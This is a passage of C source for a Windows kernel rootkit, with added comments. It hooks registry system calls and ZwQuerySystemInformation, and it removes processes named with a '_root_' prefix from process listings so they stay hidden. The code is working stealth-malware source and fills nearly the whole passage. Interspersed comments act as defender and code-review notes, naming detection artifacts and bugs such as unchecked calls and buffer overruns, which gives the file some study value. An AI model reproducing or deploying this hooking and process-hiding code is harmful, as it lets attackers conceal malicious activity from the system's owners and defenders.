#if 1
if( aProcessName )
{
/* if the process name starts w/ "_root_"
. we will not filter the request ;-) */
if(!strncmp(aProcessName, "_root_", 6))
{
DbgPrint("rootkit: detected safe process %s!\n", aProcessName);
safe = TRUE;
}
}
if(!safe)
{
__try
{
int new_index = GetRegValueMapping( hKey, Index );
if(-1 != new_index) Index = new_index;
DbgPrint("rootkit: adjusted index for call %d\n", Index);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
DbgPrint("rootkit: exception while RegValueMapping()\n");
}
}
#endif
rc=((ZWENUMERATEVALUEKEY)(OldZwEnumerateValueKey)) (
hKey,
Index,
KeyValueInfoClass,
KeyValueInfoBuffer,
KeyValueInfoBufferLength,
BytesCopied);
DbgPrint("rootkit: ZwEnumerateValueKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
/* Hook for ZwEnumerateKey: logs the calling process name, optionally remaps
 * the requested subkey Index through GetRegSubkeyMapping(), then forwards the
 * call to the saved original entry point (OldZwEnumerateKey).
 *
 * All parameters are passed through unchanged except Index, which may be
 * replaced by the mapped value. Returns whatever the original call returns;
 * note rc is an int although the function is declared NTSTATUS.
 *
 * Defender note: the "_root_" image-name prefix is the rootkit's own bypass
 * token - callers whose name starts with it are not filtered. That fixed
 * string, and the "rootkit:" DbgPrint prefix, are stable artifacts. */
NTSTATUS NewZwEnumerateKey(
HANDLE hKey,
ULONG Index,
KEY_INFORMATION_CLASS KeyInfoClass,
PVOID KeyInfoBuffer,
ULONG KeyInfoBufferLength,
PULONG BytesCopied
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
BOOL safe = FALSE;
/* GetProcessName() fills aProcessName; its termination contract is not
 * visible here - assumed to NUL-terminate within PROCNAMELEN (TODO confirm). */
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwEnumerateKey() from %s\n", aProcessName);
#if 1
/* aProcessName is a local array, so this test is always true (array-to-pointer
 * decay never yields NULL); it does not guard anything. */
if( aProcessName )
{
/* if the process name starts w/ "_root_"
. we will not filter the request ;-) */
if(!strncmp(aProcessName, "_root_", 6))
{
DbgPrint("rootkit: detected safe process %s!\n", aProcessName);
safe = TRUE;
}
}
if(!safe)
{
/* SEH guard: if GetRegSubkeyMapping() faults, the exception is swallowed and
 * the caller's original Index is used unchanged. */
__try
{
int new_index = GetRegSubkeyMapping( hKey, Index );
/* -1 is the "no mapping" sentinel for GetRegSubkeyMapping() */
if(-1 != new_index) Index = new_index;
DbgPrint("rootkit: adjusted subkey index for call %d\n", Index);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
DbgPrint("rootkit: exception while RegSubkeyMapping()\n");
}
}
#endif
/* Forward to the original system-call entry point captured at hook time. */
rc=((ZWENUMERATEKEY)(OldZwEnumerateKey)) (
hKey,
Index,
KeyInfoClass,
KeyInfoBuffer,
KeyInfoBufferLength,
BytesCopied);
DbgPrint("rootkit: ZwEnumerateKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
/* Hook for ZwDeleteKey: pass-through wrapper. Logs the calling process name
 * and the result, and forwards hKey unchanged to the saved original entry
 * point (OldZwDeleteKey). No filtering is applied here.
 *
 * Returns the original call's status; rc is an int although the function is
 * declared NTSTATUS. */
NTSTATUS NewZwDeleteKey(
HANDLE hKey
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
/* GetProcessName() is assumed to NUL-terminate within PROCNAMELEN (TODO confirm). */
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwDeleteKey() from %s\n", aProcessName);
rc=((ZWDELETEKEY)(OldZwDeleteKey)) (
hKey
);
DbgPrint("rootkit: ZwDeleteKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
/* Hook for ZwFlushKey: pass-through wrapper. Logs the calling process name
 * and the result, and forwards hKey unchanged to the saved original entry
 * point (OldZwFlushKey). No filtering is applied here.
 *
 * Returns the original call's status; rc is an int although the function is
 * declared NTSTATUS. */
NTSTATUS NewZwFlushKey(
HANDLE hKey
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
/* GetProcessName() is assumed to NUL-terminate within PROCNAMELEN (TODO confirm). */
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwFlushKey() from %s\n", aProcessName);
rc=((ZWFLUSHKEY)(OldZwFlushKey)) (
hKey
);
DbgPrint("rootkit: ZwFlushKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
/* Hook for ZwSetValueKey: pass-through wrapper. Logs the calling process name
 * and the result, and forwards every argument unchanged to the saved original
 * entry point (OldZwSetValueKey). The value name and data are neither
 * inspected nor modified here.
 *
 * Returns the original call's status; rc is an int although the function is
 * declared NTSTATUS. */
NTSTATUS NewZwSetValueKey(
HANDLE hKey,
PUNICODE_STRING uValueName,
ULONG TitleIndex,
ULONG ValueType,
PVOID pValueData,
ULONG pValueDataLength
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
/* GetProcessName() is assumed to NUL-terminate within PROCNAMELEN (TODO confirm). */
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwSetValueKey() from %s\n", aProcessName);
rc=((ZWSETVALUEKEY)(OldZwSetValueKey)) (
hKey,
uValueName,
TitleIndex,
ValueType,
pValueData,
pValueDataLength
);
DbgPrint("rootkit: ZwSetValueKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
/* Hook for ZwCreateKey: logging wrapper. Records the calling process name,
 * dumps the requested object attributes via DumpObjectAttributes(), then
 * forwards every argument unchanged to the saved original entry point
 * (OldZwCreateKey). Nothing is filtered or rewritten here.
 *
 * Returns the original call's status; rc is an int although the function is
 * declared NTSTATUS. */
NTSTATUS NewZwCreateKey(
PHANDLE phKey,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG TitleIndex,
PUNICODE_STRING Class,
ULONG CreateOptions,
PULONG pDisposition
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
/* GetProcessName() is assumed to NUL-terminate within PROCNAMELEN (TODO confirm). */
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwCreateKey() from %s\n", aProcessName);
/* Debug-only: ObjectAttributes is passed to the dumper before the real call;
 * whether DumpObjectAttributes() tolerates a NULL pointer is not visible here. */
DumpObjectAttributes(ObjectAttributes);
rc=((ZWCREATEKEY)(OldZwCreateKey)) (
phKey,
DesiredAccess,
ObjectAttributes,
TitleIndex,
Class,
CreateOptions,
pDisposition );
DbgPrint("rootkit: ZwCreateKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
.
. ______________________________________________________________________________ */
/* Hook for ZwDeleteValueKey: pass-through wrapper. Logs the calling process
 * name and the result, and forwards hKey and pValueName unchanged to the saved
 * original entry point (OldZwDeleteValueKey). No filtering is applied here.
 *
 * Returns the original call's status; rc is an int although the function is
 * declared NTSTATUS. */
NTSTATUS NewZwDeleteValueKey(
HANDLE hKey,
PUNICODE_STRING pValueName
)
{
int rc;
CHAR aProcessName[PROCNAMELEN];
/* GetProcessName() is assumed to NUL-terminate within PROCNAMELEN (TODO confirm). */
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwDeleteValueKey() from %s\n", aProcessName);
rc=((ZWDELETEVALUEKEY)(OldZwDeleteValueKey)) (
hKey,
pValueName);
DbgPrint("rootkit: ZwDeleteValueKey : rc = %x\n", rc);
return rc;
}
/* ______________________________________________________________________________
. FROM J.K.'s work, directory hiding technique, not used for now since we
. aren't trying to hide just a driver file...
. ______________________________________________________________________________ */
/* Decide whether hFile refers to one of the directories this driver treats as
 * "hidden": the file object must sit on the device pdevRoot and its FileName
 * must equal g_suWinSysDir or g_suDriversDir (case-sensitive compare, since
 * the third argument to RtlEqualUnicodeString is FALSE).
 *
 * Per the header above, this helper is currently unused.
 *
 * Review note: the return value of ObReferenceObjectByHandle() is not checked.
 * If the reference fails, pfo is an uninitialized pointer that is then
 * dereferenced and passed to ObDereferenceObject() - a kernel crash path, not
 * just a wrong answer. The requested access (FILE_READ_DATA) with a NULL object
 * type and mode 0 is passed through as written; whether that is appropriate
 * for every handle reaching this function is not visible here. */
BOOL IsHidingDir( HANDLE hFile )
{
PFILE_OBJECT pfo;
BOOL bIsHiding;
/* Unchecked: on failure pfo is left uninitialized (see note above). */
ObReferenceObjectByHandle( hFile,
FILE_READ_DATA,
NULL,
0,
(void **)&pfo,
NULL );
/* Only files on the driver's own device object are candidates. */
bIsHiding = ( pfo->DeviceObject == pdevRoot );
if( bIsHiding )
{
/* Second test: exact (case-sensitive) name match against either directory. */
BYTE bWinSysDir =
(BYTE) RtlEqualUnicodeString( &g_suWinSysDir,
&pfo->FileName,
FALSE );
if( bWinSysDir == 0 )
bWinSysDir = (BYTE) RtlEqualUnicodeString( &g_suDriversDir,
&pfo->FileName,
FALSE );
bIsHiding = bWinSysDir != 0;
}
/* Balances the reference taken above; executed even if that call failed. */
ObDereferenceObject( pfo );
return bIsHiding;
}
/* Build the full path of pfo into the caller's WCHAR buffer by recursing
 * through the RelatedFileObject chain first, so ancestors are written before
 * descendants. After each ancestor a single backslash (0x5c) is appended.
 *
 * ppsw   - in/out: write cursor into the caller's buffer; advanced past
 *          whatever was written. A terminating 0 is always stored at *ppsw.
 * pdwSize - in/out: remaining buffer space in bytes (FileName.Length is a byte
 *          count, which is why the cursor advances by Length/2 WCHARs).
 *
 * Review notes (not changed here):
 *  - Only the FileName copy is charged against *pdwSize. The backslash written
 *    after each ancestor and the final terminator are not, so with exactly
 *    enough space for the names the writes can run past the buffer end.
 *  - When a component does not fit it is silently skipped; the caller gets a
 *    truncated path with no indication that truncation occurred.
 *  - Recursion depth equals the length of the RelatedFileObject chain; no
 *    bound is enforced. */
void _stdcall GetFileFullPath( PFILE_OBJECT pfo,
WCHAR **ppsw,
PULONG pdwSize )
{
PFILE_OBJECT pfoRelated = pfo->RelatedFileObject;
if( pfoRelated != NULL )
{
/* Emit the parent path first, then a separator (not counted in *pdwSize). */
GetFileFullPath( pfoRelated, ppsw, pdwSize );
*(*ppsw)++ = 0x5c;
}
if( (*pdwSize) >= pfo->FileName.Length )
{
RtlCopyMemory( *ppsw, pfo->FileName.Buffer, pfo->FileName.Length );
*ppsw += (pfo->FileName.Length/2);
(*pdwSize) -= pfo->FileName.Length;
}
/* Terminator is written unconditionally and not counted in *pdwSize. */
**ppsw = 0;
}
/* ______________________________________________________________________________
. SystemInformation - this is a big SHIM point, hide processes & threads, etc
. ______________________________________________________________________________ */
/* Hook for ZwQuerySystemInformation: forwards the call to the saved original
 * entry point, then - if the call succeeded, the caller's image name does not
 * start with "_root_", g_hide_proc is set, and the information class is 5
 * (the class this code treats as the process list) - walks the returned
 * _SYSTEM_PROCESSES chain and unlinks every entry whose ProcessName starts
 * with "_root_" by folding its NextEntryDelta into the previous entry.
 *
 * Returns the status of the original call unchanged; the buffer contents may
 * have been edited in place.
 *
 * Defender notes: the fixed "_root_" prefix, the "rootkit:" DbgPrint strings
 * and the comparison of the raw class number 5 are all stable artifacts of
 * this hook. Cross-checking a process listing from this API against an
 * independent source is the usual way to expose list-unlinking of this kind.
 *
 * Review notes on the code as written (not changed here):
 *  - The return value of RtlUnicodeStringToAnsiString() is not checked, yet
 *    process_name.Buffer is read and RtlFreeAnsiString() is called afterwards.
 *  - memset(_pname, NULL, 255) passes a pointer constant as the fill value.
 *  - sprintf() into the 255-byte _output with a name of up to 254 bytes plus
 *    the fixed text can exceed the buffer; DbgPrint(_output) then passes a
 *    non-literal format string (CERT FIO30-C).
 *  - SystemInformation is a by-value pointer parameter, so reassigning it in
 *    the "first entry" branches changes only this function's local copy; the
 *    caller's buffer start appears unaffected. */
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
)
{
NTSTATUS rc;
CHAR aProcessName[PROCNAMELEN];
/* GetProcessName() is assumed to NUL-terminate within PROCNAMELEN (TODO confirm). */
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwQuerySystemInformation() from %s\n", aProcessName);
/* Let the real syscall fill the caller's buffer first; editing happens after. */
rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );
if( NT_SUCCESS( rc ) )
{
// double check the process name, if it starts w/ '_root_' DO NOT
// apply any stealth
if(0 == memcmp(aProcessName, "_root_", 6))
{
DbgPrint("rootkit: detected system query from _root_ process\n");
}
else if( g_hide_proc && (5 == SystemInformationClass))
{
// this is a process list, look for process names that start with
// '_root_'
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
/* Entries are chained by byte offset (NextEntryDelta); 0 marks the end. */
while(curr)
{
//struct _SYSTEM_PROCESSES *next = ((char *)curr += curr->NextEntryDelta);
ANSI_STRING process_name;
/* TRUE = allocate the ANSI buffer; freed by RtlFreeAnsiString() below.
 * The conversion's status is not checked. */
RtlUnicodeStringToAnsiString( &process_name, &(curr->ProcessName), TRUE);
/* Length bounds keep the memcpy into _pname[255] below in range. */
if( (0 < process_name.Length) && (255 > process_name.Length) )
{
if(0 == memcmp( process_name.Buffer, "_root_", 6))
{
//////////////////////////////////////////////
// we have a winner!
//////////////////////////////////////////////
char _output[255];
char _pname[255];
/* NULL used as an int fill value; see review notes above. */
memset(_pname, NULL, 255);
memcpy(_pname, process_name.Buffer, process_name.Length);
/* _output may be too small for a long name; see review notes above. */
sprintf( _output,
"rootkit: hiding process, pid: %d\tname: %s\r\n",
curr->ProcessId,
_pname);
/* Non-literal format string; see review notes above. */
DbgPrint(_output);
if(prev)
{
if(curr->NextEntryDelta)
{
// make prev skip this entry
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
// we are last, so make prev the end
prev->NextEntryDelta = 0;
}
}
else
{
/* Both branches below only modify the local parameter copy. */
if(curr->NextEntryDelta)
{
// we are first in the list, so move it forward
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
// we are the only process!
SystemInformation = NULL;
}
}
}
}
RtlFreeAnsiString(&process_name);
/* prev is advanced to curr even when curr was just unlinked. */
prev = curr;
/* Cast-as-lvalue is a compiler extension; advances curr by the byte delta. */
if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
}
}
return(rc);
}